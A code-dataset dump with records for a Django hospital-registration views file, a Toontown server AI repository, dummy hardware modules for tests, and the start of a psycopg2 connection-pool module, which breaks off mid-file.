tmp[key][0]\n del tmp['csrfmiddlewaretoken']\n # return JsonResponse(parse_json_form(tmp))\n data = parse_json_form(tmp)\n status, fields = api.get_collection_pattern(collection_name)\n fill_field(fields, data)\n status, result = api.admin_update_document(collection_name, object_id, data)\n if status:\n return redirect('..')\n else:\n return redirect('.')\n status, fields = api.get_collection_pattern(collection_name)\n status, data = api.admin_get_detail(collection_name, object_id)\n clean_datatype(data)\n found_id = False\n for i in range(len(fields)):\n if fields[i]['field_name'] == '_id':\n found_id = True\n index = i\n break\n if found_id:\n del fields[index]\n return render(\n request,\n 'app/admin_mongo-add.html',\n {\n 'title': 'mongoDB Admin',\n 'header_title': 'mongoDB Admin',\n 'collection_name': collection_name,\n 'fields': json.dumps(fields).replace('\"', '\\\\\"').replace(\"'\", \"\\\\'\"),\n 'data': json.dumps(data).replace('\"', '\\\\\"').replace(\"'\", \"\\\\'\"),\n 'logo_link': '/staff',\n 'only_logout': True\n }\n )\n\n@login_required(login_url='/accounts/login')\ndef admin_mongo_delete(request, collection_name, object_id):\n if not check_user_group('staff', request.user) and not request.user.is_superuser:\n raise PermissionDenied\n if request.method == 'POST':\n status, result = api.admin_delete_document(collection_name, object_id)\n respose = {'ok': 1 if status else 0}\n return JsonResponse(respose)\n else:\n pass\n\ndef login(request):\n assert isinstance(request, HttpRequest)\n if request.method == 'POST':\n status, username = api.verify_password(\n request.POST['username'], request.POST['password'])\n if status:\n status, result = api.check_already_used_this_username(\n request.POST['username'])\n if not status:\n request.session['just_regis'] = True\n request.session['user'] = {\n 'username': request.POST['username'], 'is_authenticated': True}\n return redirect(request.POST['next'])\n\n else:\n return render(\n request,\n 'app/login.html',\n {\n 'title': 'Log in',\n 'error': True\n }\n )\n if 'user' in request.session: # mind add\n if request.session['user'].get('is_authenticated'): # mind one tab\n return redirect('/') # mind one tab\n next_page = '/'\n if 'next' in request.GET:\n next_page = request.GET['next']\n return render(\n request,\n 'app/login.html',\n {\n 'title': 'Log in',\n 'next': next_page\n }\n )\n\n@login_required(login_url=\"/accounts/login\")\ndef register(request):\n if len(request.user.groups.all()) > 0:\n raise PermissionDenied\n \"\"\"Renders the about page.\"\"\"\n if request.method == 'POST':\n patient_name_title = request.POST['patient_name_title']\n patient_name = request.POST['patient_name']\n patient_surname = request.POST['patient_surname']\n # patient_img = request.POST['patient_img']\n id_card_number = request.POST['id_card_number']\n gender = request.POST['gender'] == 'ชาย'\n birthday = request.POST['birthday'].split('-')\n birthday_day = int(birthday[2])\n birthday_month = int(birthday[1])\n birthday_year = int(birthday[0])\n blood_group_abo = int(request.POST['blood_group_abo'])\n race = request.POST['race']\n nationallity = request.POST['nationallity']\n religion = request.POST['religion']\n Status = int(request.POST['status'])\n patient_address = request.POST['patient_address']\n occupy = request.POST['occupy']\n telephone_number = request.POST['telephone_number']\n father_name = request.POST['father_name']\n mother_name = request.POST['mother_name']\n emergency_name = request.POST['emergency_name']\n emergency_phone = request.POST['emergency_phone']\n emergency_addr = request.POST['emergency_addr']\n email = request.POST['email']\n congenital_disease = request.POST['congenital_disease'].split(',')\n # เติมให้ครบ\n status, result = api.register(request.user.username, patient_name_title, patient_name, patient_surname, '',\n id_card_number, gender, birthday_year, birthday_month, birthday_day,\n blood_group_abo, 0, race, nationallity, religion, Status,\n patient_address, occupy, telephone_number, father_name, mother_name, emergency_name,\n emergency_phone, emergency_addr, email, congenital_disease, True)\n print(result)\n if status:\n return redirect('/')\n else:\n return render(\n request,\n 'app/register.html',\n {\n 'title': 'ข้อมูลผู้ป่วย',\n 'logged_user': request.user.username,\n 'REGISTER_PAGE': True\n }\n )\n else:\n return render(\n request,\n 'app/register.html',\n {\n 'title': 'ข้อมูลผู้ป่วย',\n 'logged_user': request.user.username,\n 'REGISTER_PAGE': True\n }\n )\n","sub_path":"kkhospital/app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":31794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"149448043","text":"import toontown.minigame.MinigameCreatorAI\nfrom toontown.distributed.ToontownDistrictAI import ToontownDistrictAI\nfrom toontown.distributed.ToontownDistrictStatsAI import ToontownDistrictStatsAI\nfrom otp.ai.TimeManagerAI import TimeManagerAI\nfrom otp.ai.MagicWordManagerAI import MagicWordManagerAI\nfrom toontown.ai.HolidayManagerAI import HolidayManagerAI\nfrom toontown.ai.NewsManagerAI import NewsManagerAI\nfrom toontown.ai.FishManagerAI import FishManagerAI\nfrom toontown.safezone.SafeZoneManagerAI import SafeZoneManagerAI\nfrom toontown.distributed.ToontownInternalRepository import ToontownInternalRepository\nfrom toontown.toon import NPCToons\nfrom toontown.hood import TTHoodDataAI, DDHoodDataAI, DGHoodDataAI, BRHoodDataAI, MMHoodDataAI, DLHoodDataAI, FFHoodDataAI\nfrom toontown.hood import OZHoodDataAI, GSHoodDataAI, GZHoodDataAI, ZoneUtil\nfrom toontown.hood import SellbotHQDataAI, CashbotHQDataAI, LawbotHQDataAI, BossbotHQDataAI\nfrom toontown.toonbase import ToontownGlobals\nfrom direct.distributed.PyDatagram import *\nfrom otp.ai.AIZoneData import *\nfrom toontown.dna.DNAParser import *\nfrom toontown.coghq import MintManagerAI, FactoryManagerAI, LawOfficeManagerAI, CountryClubManagerAI\nfrom otp.friends.FriendManagerAI import FriendManagerAI\nfrom toontown.estate.EstateManagerAI import EstateManagerAI\nfrom toontown.uberdog.DistributedPartyManagerAI import DistributedPartyManagerAI\nfrom otp.distributed.OtpDoGlobals import *\nfrom direct.task import Task\nfrom toontown.toonbase import ToontownGlobals\nfrom toontown.effects.DistributedFireworkShowAI import DistributedFireworkShowAI\nfrom toontown.effects import FireworkShows\nimport random\nfrom direct.distributed.ClockDelta import *\nimport time, os, datetime, sys\nfrom otp.ai.MagicWordGlobal import *\nfrom toontown.parties import PartyGlobals\n\nfrom toontown.tutorial.TutorialManagerAI import TutorialManagerAI\nfrom DistributedSuitInvasionManagerAI import DistributedSuitInvasionManagerAI, SuitDNA\nfrom QuestManagerAI import QuestManagerAI\nfrom PromotionManagerAI import PromotionManagerAI\nfrom toontown.battle.CogPageManagerAI import CogPageManagerAI\nfrom toontown.coghq.CogSuitManagerAI import CogSuitManagerAI\nfrom toontown.building.DistributedTrophyMgrAI import *\nfrom toontown.estate.DistributedBankMgrAI import *\nfrom toontown.catalog.CatalogManagerAI import *\nfrom toontown.pets.PetManagerAI import *\n\nhoods = (TTHoodDataAI.TTHoodDataAI, DDHoodDataAI.DDHoodDataAI, DGHoodDataAI.DGHoodDataAI,\n BRHoodDataAI.BRHoodDataAI, MMHoodDataAI.MMHoodDataAI, DLHoodDataAI.DLHoodDataAI,\n GSHoodDataAI.GSHoodDataAI, OZHoodDataAI.OZHoodDataAI, GZHoodDataAI.GZHoodDataAI,\n SellbotHQDataAI.SellbotHQDataAI, CashbotHQDataAI.CashbotHQDataAI,\n LawbotHQDataAI.LawbotHQDataAI, BossbotHQDataAI.BossbotHQDataAI,\n #FFHoodDataAI.FFHoodDataAI\n)\n \nimport DistributedResistanceEmoteMgrAI\nimport DistributedPolarPlaceEffectMgrAI\n\nfrom toontown.uberdog.BanManagerAI import BanManagerAI\nfrom toontown.uberdog.ShardAPIManagerAI import ShardAPIManagerAI\n\nclass ToontownAIRepository(ToontownInternalRepository):\n def __init__(self, baseChannel, serverId, districtName):\n ToontownInternalRepository.__init__(self, baseChannel, serverId, dcSuffix='AI')\n\n self.districtName = districtName\n\n self.zoneAllocator = UniqueIdAllocator(ToontownGlobals.DynamicZonesBegin,\n ToontownGlobals.DynamicZonesEnd)\n\n NPCToons.generateZone2NpcDict()\n self.hoods = []\n self._dnaStoreMap = {}\n \n self.zoneDataStore = AIZoneDataStore()\n\n self.useAllMinigames = self.config.GetBool('want-all-minigames', False)\n self.doLiveUpdates = True\n \n self.wantCogdominiums = self.config.GetBool('want-cogdo', False)\n self.wantParties = self.config.GetBool('want-parties', True)\n self.wantEmblems = self.config.GetBool('want-emblems', True)\n \n self.questManager = QuestManagerAI(self)\n self.promotionMgr = PromotionManagerAI(self)\n self.cogPageManager = CogPageManagerAI(self)\n self.cogSuitMgr = CogSuitManagerAI(self)\n\n self.trophyMgr = DistributedTrophyMgrAI(self)\n \n self.fishManager = FishManagerAI()\n\t\t\n self.dnaStoreMap = {}\n \n self.mintMgr = MintManagerAI.MintManagerAI(self)\n self.factoryMgr = FactoryManagerAI.FactoryManagerAI(self)\n self.lawMgr = LawOfficeManagerAI.LawOfficeManagerAI(self)\n self.countryClubMgr = CountryClubManagerAI.CountryClubManagerAI(self)\n \n self.buildingManagers = {}\n self.suitPlanners = {}\n \n self.wantMegaInvasions = str(self.ourChannel // 1000000) in self.config.GetString('mega-invasion-shards', '402 403').split()\n\n self.accept('GLOBAL_MSG_CLOSING_FOR_UPDATE_NOW', sys.exit, [1024])\n\n def getTrackClsends(self):\n return False\n \n def handleConnected(self):\n ToontownInternalRepository.handleConnected(self)\n self.districtId = self.allocateChannel()\n self.distributedDistrict = ToontownDistrictAI(self)\n self.distributedDistrict.setName(self.districtName)\n self.distributedDistrict.generateWithRequiredAndId(simbase.air.districtId, self.getGameDoId(), 2)\n\n dg = PyDatagram()\n dg.addServerHeader(simbase.air.districtId, simbase.air.ourChannel, STATESERVER_OBJECT_SET_AI)\n dg.addChannel(simbase.air.ourChannel)\n simbase.air.send(dg)\n\n self.createGlobals()\n self.createZones()\n\n def __ready(self):\n self.removeAtExit(self.districtStats.doId)\n\n self.apiMgr = ShardAPIManagerAI(self)\n self.apiMgr.d_setShardData()\n \n self.banMgr = BanManagerAI(self)\n \n self.trophyMgr.updateToonData()\n \n def gotUberdogAPISync(self):\n if not self.distributedDistrict.getAvailable():\n self.notify.info('Got UD API sync, opening shard...')\n messenger.send('startShardActivity')\n self.distributedDistrict.b_setAvailable(1)\n self.sendNetEvent('shardStarted')\n self.addExitEvent('shardDied')\n\n def incrementPopulation(self):\n self.districtStats.b_setAvatarCount(self.districtStats.getAvatarCount() + 1)\n\n def decrementPopulation(self):\n self.districtStats.b_setAvatarCount(self.districtStats.getAvatarCount() - 1)\n\n def allocateZone(self):\n return self.zoneAllocator.allocate()\n\n def deallocateZone(self, zone):\n self.zoneAllocator.free(zone)\n\n def getZoneDataStore(self):\n return self.zoneDataStore\n\n def getAvatarExitEvent(self, avId):\n return 'distObjDelete-%d' % avId\n\n def createGlobals(self):\n self.districtStats = ToontownDistrictStatsAI(self)\n self.districtStats.settoontownDistrictId(self.districtId)\n self.districtStats.generateWithRequiredAndId(self.allocateChannel(), self.getGameDoId(), 2)\n\t\t\n self.timeManager = TimeManagerAI(self)\n self.timeManager.generateWithRequired(2)\n\n self.newsManager = NewsManagerAI(self)\n self.newsManager.generateWithRequired(2)\n\n self.holidayManager = HolidayManagerAI(self)\n\n self.magicWordManager = MagicWordManagerAI(self)\n self.magicWordManager.generateWithRequired(2)\n\n self.safeZoneManager = SafeZoneManagerAI(self)\n self.safeZoneManager.generateWithRequired(2)\n\t\t\n self.petMgr = PetManagerAI(self)\n\n self.friendManager = FriendManagerAI(self)\n self.friendManager.generateWithRequired(2)\n\n self.partyManager = DistributedPartyManagerAI(self)\n self.partyManager.generateWithRequired(2)\n\t\t\n self.tutorialManager = TutorialManagerAI(self)\n self.tutorialManager.generateWithRequired(2)\n\t\t\n self.estateManager = EstateManagerAI(self)\n self.estateManager.generateWithRequired(2)\n \n self.suitInvasionManager = DistributedSuitInvasionManagerAI(self)\n self.suitInvasionManager.generateWithRequired(2)\n\n self.bankMgr = DistributedBankMgrAI(self)\n self.bankMgr.generateWithRequired(2)\n \n self.catalogManager = CatalogManagerAI(self)\n self.catalogManager.generateWithRequired(2)\n \n self.huntId = 0\n \n if self.holidayManager.isHolidayRunning(ToontownGlobals.TRICK_OR_TREAT):\n import DistributedTrickOrTreatTargetAI\n self.trickOrTreatMgr = DistributedTrickOrTreatTargetAI.DistributedTrickOrTreatTargetAI(self)\n self.trickOrTreatMgr.generateWithRequired(2)\n \n self.handleBlackCatMgr()\n self.handleBloodsuckerInvasion()\n self.handleSkelCogWeekInvasion()\n \n if config.GetBool('want-resistance-emote', True):\n self.resistanceMgr = DistributedResistanceEmoteMgrAI.DistributedResistanceEmoteMgrAI(self)\n self.resistanceMgr.generateWithRequired(9720)\n \n if config.GetBool('want-top-toons', True):\n self.topToonsMgr = self.generateGlobalObject(OTP_DO_ID_TOONTOWN_TOP_TOONS_MGR, 'DistributedTopToonsManager')\n \n else:\n self.topToonsMgr = None\n\n if config.GetBool('want-polar-effect', True):\n self.polarMgr = DistributedPolarPlaceEffectMgrAI.DistributedPolarPlaceEffectMgrAI(self)\n self.polarMgr.generateWithRequired(3821)\n \n def handleBlackCatMgr(self):\n today = datetime.datetime.now()\n start = datetime.datetime(today.year, 10, 31)\n end = datetime.datetime(today.year, 11, 3)\n \n def createBlackCatMgr(task=None):\n import DistributedBlackCatMgrAI\n self.blackCatMgr = DistributedBlackCatMgrAI.DistributedBlackCatMgrAI(self)\n self.blackCatMgr.generateWithRequired(2513)\n if not self.config.GetBool('force-black-cat-mgr', False):\n self.blackCatMgr.expire((end - today).total_seconds())\n return Task.done\n \n if start <= today < end or self.config.GetBool('force-black-cat-mgr', False):\n createBlackCatMgr(None)\n \n elif start >= today:\n taskMgr.doMethodLater((start - today).total_seconds(), createBlackCatMgr, 'air-createBlackCatMgr')\n \n def handleBloodsuckerInvasion(self):\n if not self.wantMegaInvasions:\n return\n \n today = datetime.datetime.now()\n start = datetime.datetime(today.year, 10, 31)\n end = datetime.datetime(today.year, 11, 3)\n \n if start <= today < end:\n self.startMegaInvasion(9, end=end)\n \n elif start > today:\n taskMgr.doMethodLater((start - today).total_seconds(), self.startMegaInvasion, 'air-mega-invasion-9', extraArgs=[9, False, end])\n \n def handleSkelCogWeekInvasion(self):\n if not self.wantMegaInvasions:\n return\n \n today = datetime.datetime.now()\n start = datetime.datetime(today.year, 11, 10)\n end = datetime.datetime(today.year, 11, 17)\n \n if start <= today < end:\n self.startMegaInvasion(-1, skel=True, end=end)\n \n elif start > today:\n taskMgr.doMethodLater((start - today).total_seconds(), self.startMegaInvasion, 'air-mega-invasion-skel', extraArgs=[-1, True, end])\n \n def startMegaInvasion(self, suitIndex, skel=False, end=None):\n if suitIndex >= 0:\n suitName = SuitDNA.suitHeadTypes[suitIndex]\n \n else:\n suitName = None\n \n if self.suitInvasionManager.hasInvading():\n if self.suitInvasionManager.isMega():\n return Task.done\n \n self.suitInvasionManager.abort()\n \n self.suitInvasionManager.startInvasion(suitName, skel, mega=True)\n if end:\n def doAbort(task):\n self.suitInvasionManager.abort()\n return task.done\n\n today = datetime.datetime.now()\n taskMgr.doMethodLater((end - today).total_seconds(), doAbort, 'air-abort-mega-invasion')\n \n def getStorage(self, zone):\n s = self._dnaStoreMap.get(zone)\n if not s:\n s = DNAStorage()\n self.loadDNAFileAI(s, self.genDNAFileName(zone))\n self._dnaStoreMap[zone] = s\n \n return s\n\n def createZones(self):\n self.zoneTable = {\n 1000: ((1000, 1, 0), (1100, 1, 1), (1200, 1, 1), (1300, 1, 1)),\n 2000: ((2000, 1, 0), (2100, 1, 1), (2200, 1, 1), (2300, 1, 1)),\n 3000: ((3000, 1, 0), (3100, 1, 1), (3200, 1, 1), (3300, 1, 1)),\n 4000: ((4000, 1, 0), (4100, 1, 1), (4200, 1, 1), (4300, 1, 1)),\n 5000: ((5000, 1, 0), (5100, 1, 1), (5200, 1, 1), (5300, 1, 1)),\n 9000: ((9000, 1, 0), (9100, 1, 1), (9200, 1, 1)),\n \n 6000: (),\n 7000: ((7000, 1, 0), (7100, 1, 1)),\n 8000: ((8000, 1, 0),),\n 10000: (),\n 11000: (),\n 12000: (),\n 13000: (),\n 17000: (),\n }\n \n self.__nextHood(0)\n \n def __nextHood(self, hoodIndex):\n if hoodIndex >= len(hoods):\n self.__ready()\n return Task.done\n \n self.hoods.append(hoods[hoodIndex](self))\n taskMgr.doMethodLater(0, ToontownAIRepository.__nextHood, 'nextHood', [self, hoodIndex + 1])\n return Task.done\n\n def sendSetZone(self, obj, zoneId):\n obj.b_setLocation(obj.parentId, zoneId)\n \n def getDisconnectReason(self, avId):\n return self.timeManager.disconnectReasonMap.get(avId, 1) # Default: user closed window\n \n def killToon(self, avId, force = True):\n return\n\n\n '''\n Kills given toon if within this shard.\n If force is False, then checks getDisconnectReason.\n '''\n toon = self.doId2do.get(avId)\n \n if not toon:\n self.notify.warning('Tried to kill non-existing toon %s' % avId)\n return False\n \n if not force:\n if self.getDisconnectReason(avId) == 3: # Python Error\n return False\n \n toon.b_setHp(0)\n \n inventory = toon.inventory\n inventory.zeroInv()\n toon.b_setInventory(inventory.makeNetString())\n \n self.notify.info('Killed toon %s, RIP!' % avId)\n return True\n \n def handleObjExit(self, di):\n doId = di.getUint32()\n\n if doId not in self.doId2do:\n self.notify.warning('Received AI exit for unknown object %d' % (doId))\n return\n\n do = self.doId2do[doId]\n do.sendDeleteEvent()\n self.removeDOFromTables(do)\n do.delete()\n\n@magicWord(types=[int, str], chains=[CHAIN_HEAD])\ndef closeserver(time, type='maintenance'):\n if type not in ('maintenance', 'update'):\n return 'Invalid type!'\n \n if time < 0 or time in (2, 3, 4):\n return 'Min time is 5 (or 0 to abort, 1 to get)'\n \n av = spellbook.getInvoker()\n av.air.sendNetEvent('GLOBAL_MSG_CLOSING_FOR_UPDATE', [time, type])\n \n def resp(status):\n if status:\n channel = av.GetPuppetConnectionChannel(av.doId)\n av.air.sendSysMsg(status, channel)\n \n av.air.acceptOnce('GLOBAL_MSG_CLOSING_FOR_UPDATE_RESP', resp)\n","sub_path":"game/toontown/ai/ToontownAIRepository.py","file_name":"ToontownAIRepository.py","file_ext":"py","file_size_in_byte":15717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"375799801","text":"\"\"\"Import dummy modules if actual modules not installed. Sets dummy modules in sys so subsequent imports\nuse the dummies\"\"\"\n\nimport sys\nfrom typing import Set\nimport unittest.mock\n\nclass dummy_package:\n pass\n\nclass dummy_pytabor(dummy_package):\n @staticmethod\n def open_session(*args, **kwargs):\n return None\n\nclass dummy_pyvisa(dummy_package):\n class resources(dummy_package):\n class messagebased(dummy_package):\n class MessageBasedResource:\n def __init__(self, *args, **kwargs):\n self.logged_writes = []\n self.logged_asks = []\n self.answers = dict()\n self.default_answer = '0, bla'\n\n def write(self, *args, **kwargs):\n self.logged_writes.append((args, kwargs))\n\n def ask(self, *args, **kwargs):\n self.logged_asks.append((args, kwargs))\n ques = args[0].split(';')\n ques = [q.strip(' ?') for q in ques if q.strip().endswith('?')]\n answers = [self.answers[q] if q in self.answers else self.default_answer\n for q in ques]\n return ';'.join(answers)\n\n def query(self, *args, **kwargs):\n self.logged_asks.append((args, kwargs))\n ques = args[0].split(';')\n ques = [q.strip(' ?') for q in ques if q.strip().endswith('?')]\n answers = [self.answers[q] if q in self.answers else self.default_answer\n for q in ques]\n return ';'.join(answers)\n\n\ndummy_pyvisa.resources.MessageBasedResource = dummy_pyvisa.resources.messagebased.MessageBasedResource\n\n\nclass dummy_teawg(dummy_package):\n # WX2184 Properties\n _wx2184_properties = {\n 'model_name': 'WX2184', # the model name\n 'fw_ver': 0.0, # the firmware version\n 'serial_num': '0' * 9, # serial number\n 'num_parts': 2, # number of instrument parts\n 'chan_per_part': 2, # number of channels per part\n 'seg_quantum': 16, # segment-length quantum\n 'min_seg_len': 192, # minimal segment length\n 'max_arb_mem': 32E6, # maximal arbitrary-memory (points per channel)\n 'min_dac_val': 0, # minimal DAC value\n 'max_dac_val': 2 ** 14 - 1, # maximal DAC value\n 'max_num_segs': 32E+3, # maximal number of segments\n 'max_seq_len': 48 * 1024, # maximal sequencer-table length (# rows)\n 'min_seq_len': 3, # minimal sequencer-table length (# rows)\n 'max_num_seq': 1000, # maximal number of sequencer-table\n 'max_aseq_len': 48 * 1024 - 2, # maximal advanced-sequencer table length\n 'min_aseq_len': 3, # minimal advanced-sequencer table length\n 'min_sclk': 75e6, # minimal sampling-rate (samples/seconds)\n 'max_sclk': 2300e6, # maximal sampling-rate (samples/seconds)\n 'digital_support': False, # is digital-wave supported?\n }\n\n # WX1284 Definitions\n _wx1284_properties = {\n 'model_name': 'WX1284', # the model name\n 'fw_ver': 0.0, # the firmware version\n 'serial_num': '0' * 9, # serial number\n 'num_parts': 2, # number of instrument parts\n 'chan_per_part': 2, # number of channels per part\n 'seg_quantum': 16, # segment-length quantum\n 'min_seg_len': 192, # minimal segment length\n 'max_arb_mem': 32E6, # maximal arbitrary-memory (points per channel)\n 'min_dac_val': 0, # minimal DAC value\n 'max_dac_val': 2 ** 14 - 1, # maximal DAC value\n 'max_num_segs': 32E+3, # maximal number of segments\n 'max_seq_len': 48 * 1024, # maximal sequencer-table length (# rows)\n 'min_seq_len': 3, # minimal sequencer-table length (# rows)\n 'max_num_seq': 1000, # maximal number of sequencer-table\n 'max_aseq_len': 48 * 1024 - 2, # maximal advanced-sequencer table length\n 'min_aseq_len': 3, # minimal advanced-sequencer table length\n 'min_sclk': 75e6, # minimal sampling-rate (samples/seconds)\n 'max_sclk': 1250e6, # maximal sampling-rate (samples/seconds)\n 'digital_support': False, # is digital-wave supported?\n }\n\n # WX2182C Definitions\n _wx2182C_properties = {\n 'model_name': 'WX2182C', # the model name\n 'fw_ver': 0.0, # the firmware version\n 'serial_num': '0' * 9, # serial number\n 'num_parts': 2, # number of instrument parts\n 'chan_per_part': 1, # number of channels per part\n 'seg_quantum': 16, # segment-length quantum\n 'min_seg_len': 192, # minimal segment length\n 'max_arb_mem': 32E6, # maximal arbitrary-memory (points per channel)\n 'min_dac_val': 0, # minimal DAC value\n 'max_dac_val': 2 ** 14 - 1, # maximal DAC value\n 'max_num_segs': 32E+3, # maximal number of segments\n 'max_seq_len': 48 * 1024, # maximal sequencer-table length (# rows)\n 'min_seq_len': 3, # minimal sequencer-table length (# rows)\n 'max_num_seq': 1000, # maximal number of sequencer-table\n 'max_aseq_len': 1000, # maximal advanced-sequencer table length\n 'min_aseq_len': 3, # minimal advanced-sequencer table length\n 'min_sclk': 10e6, # minimal sampling-rate (samples/seconds)\n 'max_sclk': 2.3e9, # maximal sampling-rate (samples/seconds)\n 'digital_support': False, # is digital-wave supported?\n }\n\n # WX1282C Definitions\n _wx1282C_properties = {\n 'model_name': 'WX1282C', # the model name\n 'fw_ver': 0.0, # the firmware version\n 'serial_num': '0' * 9, # serial number\n 'num_parts': 2, # number of instrument parts\n 'chan_per_part': 1, # number of channels per part\n 'seg_quantum': 16, # segment-length quantum\n 'min_seg_len': 192, # minimal segment length\n 'max_arb_mem': 32E6, # maximal arbitrary-memory (points per channel)\n 'min_dac_val': 0, # minimal DAC value\n 'max_dac_val': 2 ** 14 - 1, # maximal DAC value\n 'max_num_segs': 32E+3, # maximal number of segments\n 'max_seq_len': 48 * 1024, # maximal sequencer-table length (# rows)\n 'min_seq_len': 3, # minimal sequencer-table length (# rows)\n 'max_num_seq': 1000, # maximal number of sequencer-table\n 'max_aseq_len': 1000, # maximal advanced-sequencer table length\n 'min_aseq_len': 3, # minimal advanced-sequencer table length\n 'min_sclk': 10e6, # minimal sampling-rate (samples/seconds)\n 'max_sclk': 1.25e9, # maximal sampling-rate (samples/seconds)\n 'digital_support': False, # is digital-wave supported?\n }\n\n # dictionary of supported-models' properties\n model_properties_dict = {\n 'WX2184': _wx2184_properties,\n 'WX2184C': _wx2184_properties,\n 'WX1284': _wx2184_properties,\n 'WX1284C': _wx2184_properties,\n 'WX2182C': _wx2182C_properties,\n 'WX1282C': _wx1282C_properties,\n }\n class TEWXAwg:\n _make_combined_wave_calls = []\n\n def __init__(self, *args, paranoia_level=1, model='WX2184C', **kwargs):\n self.logged_commands = []\n self.logged_queries = []\n self._visa_inst = dummy_pyvisa.resources.MessageBasedResource()\n self.paranoia_level = paranoia_level\n self.dev_properties = dummy_teawg.model_properties_dict[model]\n\n self._download_segment_lengths_calls = []\n self._send_binary_data_calls = []\n self._download_adv_seq_table_calls = []\n self._download_sequencer_table_calls = []\n\n @property\n def is_simulator(self):\n return False\n @property\n def visa_inst(self):\n return self._visa_inst\n def send_cmd(self, *args, **kwargs):\n self.logged_commands.append((args, kwargs))\n def send_query(self, *args, **kwargs):\n return self._visa_inst.ask(*args, **kwargs)\n def download_segment_lengths(self, seg_len_list, pref='dummy_pref', paranoia_level='dummy_paranoia'):\n self._download_segment_lengths_calls.append((seg_len_list, pref, paranoia_level))\n def send_binary_data(self, pref, bin_dat, paranoia_level='dummy_paranoia'):\n self._send_binary_data_calls.append((pref, bin_dat, paranoia_level))\n def download_adv_seq_table(self, advanced_sequencer_table, pref=':ASEQ:DATA', paranoia_level=None):\n self._download_adv_seq_table_calls.append((advanced_sequencer_table, pref, paranoia_level))\n def download_sequencer_table(self, *args, **kwargs):\n self._download_sequencer_table_calls.append((args, kwargs))\n\n @staticmethod\n def make_combined_wave(wav1, wav2, dest_array, dest_array_offset=0, add_idle_pts=False, quantum=16):\n dummy_teawg.TEWXAwg._make_combined_wave_calls.append((wav1, wav2, dest_array, dest_array_offset, add_idle_pts, quantum))\n\nclass dummy_atsaverage(dummy_package):\n class atsaverage(dummy_package):\n pass\n class alazar(dummy_package):\n pass\n class core(dummy_package):\n class AlazarCard:\n model = 'DUMMY'\n minimum_record_size = 256\n def __init__(self):\n self._startAcquisition_calls = []\n self._applyConfiguration_calls = []\n def startAcquisition(self, x: int):\n self._startAcquisition_calls.append(x)\n def applyConfiguration(self, config):\n self._applyConfiguration_calls.append(config)\n class config(dummy_package):\n class CaptureClockConfig:\n def numeric_sample_rate(self, card):\n return 10**8\n class ScanlineConfiguration:\n def __init__(self):\n self._apply_calls = []\n def apply(self, card, print_debug_output):\n self._apply_calls.append((card, print_debug_output))\n aimedBufferSize = unittest.mock.PropertyMock(return_value=2**22)\n ScanlineConfiguration.captureClockConfiguration = CaptureClockConfig()\n class operations(dummy_package):\n class OperationDefinition:\n pass\n class masks(dummy_package):\n class Mask:\n pass\n class CrossBufferMask:\n pass\n\n\ndef import_package(name, package=None) -> Set[dummy_package]:\n if package is None:\n package_dict = dict(atsaverage=dummy_atsaverage,\n pyvisa=dummy_pyvisa,\n pytabor=dummy_pytabor,\n teawg=dummy_teawg)\n if name in package_dict:\n package = package_dict[name]\n else:\n raise KeyError('Unknown package', name)\n\n imported = set()\n sys.modules[name] = package\n imported.add(package)\n for attr in dir(package):\n if isinstance(getattr(package, attr), type) and issubclass(getattr(package, attr), dummy_package):\n imported |= import_package(name + '.' + attr, getattr(package, attr))\n return imported\n\n\ndef replace_missing():\n failed_imports = set()\n try:\n import pytabor\n except ImportError:\n failed_imports |= import_package('pytabor', dummy_pytabor)\n\n try:\n import pyvisa\n except ImportError:\n failed_imports |= import_package('pyvisa', dummy_pyvisa)\n\n try:\n import teawg\n except ImportError:\n failed_imports |= import_package('teawg', dummy_teawg)\n\n try:\n import atsaverage\n import atsaverage.config\n except ImportError:\n failed_imports |= import_package('atsaverage', dummy_atsaverage)\n return failed_imports\n\n","sub_path":"tests/hardware/dummy_modules.py","file_name":"dummy_modules.py","file_ext":"py","file_size_in_byte":11726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"142254441","text":"# -*- coding: utf-8 -*-\n\"\"\"\nConnection module\n\n\"\"\"\nfrom __future__ import division, print_function, unicode_literals\n# from psycopg2.pool import SimpleConnectionPool\nfrom psycopg2.extensions import ISOLATION_LEVEL_AUTOCOMMIT\n\nimport psycopg2\nimport psycopg2.extras # load the psycopg extras module\nimport traceback\nimport os\nimport sqlalchemy\n\nfrom labtrans.utils import log\n\n\nclass Pool():\n \"\"\"\n Connection Pool\n\n \"\"\"\n _connection = {}\n _pool = None\n _cursor = None\n _settings = {}\n _debug = False\n\n @classmethod\n def debug(cls, debug_flag: bool=None):\n \"\"\"\n\n :param debug_flag:\n \"\"\"\n if debug_flag is None:\n return cls._debug\n cls._debug = debug_flag\n\n @staticmethod\n def connection(db_name: str='default') -> object:\n \"\"\"\n\n :param db_name:\n :return: psycopg2 connection\n \"\"\"\n return Pool._connection[db_name][os.getpid()]\n\n @staticmethod\n def commit(db_name: str='default'):\n \"\"\"\n\n :param db_name:\n \"\"\"\n (Pool.connection(db_name)).commit()\n\n\n @staticmethod\n def rollback(db_name: str='default'):\n \"\"\"\n\n :param db_name:\n \"\"\"\n (Pool.connection(db_name)).rollback()\n\n\n @staticmethod\n def prepare_dsn(settings_db: dict, db_name: str='default'):\n \"\"\"\n\n :param settings_db:\n :param db_name:\n :return:\n \"\"\"\n return (\n ('host=%(HOST)s dbname=%(NAME)s user=%(USER)s ' +\n 'password=%(PASSWORD)s') %\n settings_db[db_name]\n )\n\n @staticmethod\n def create_connection(dsn: str):\n \"\"\"\n\n :param dsn:\n :return:\n \"\"\"\n return psycopg2.connect(dsn=dsn)\n\n @staticmethod\n def connect(db_settings: dict=None, db_name='default'):\n \"\"\"\n Connects to a base conn: host=localhost dbname=db_name user=postgres\n\n :param _settings_db:\n\n \"\"\"\n Pool._settings[db_name] = db_settings\n\n _conn_string = (\n ('host=%(HOST)s dbname=%(NAME)s user=%(USER)s ' +\n 'password=%(PASSWORD)s') % db_settings\n )\n\n # Pool.conn_string = _conn_string\n if db_name not in Pool._connection:\n Pool._connection[db_name] = {}\n\n Pool._connection[db_name][os.getpid()] = psycopg2.connect(\n dsn=_conn_string,\n connection_factory=psycopg2.extras.NamedTupleConnection\n )\n\n @staticmethod\n def get_engine(db_name: str='default'):\n \"\"\"\n\n :param db_name:\n :return:\n \"\"\"\n return sqlalchemy.create_engine(\n 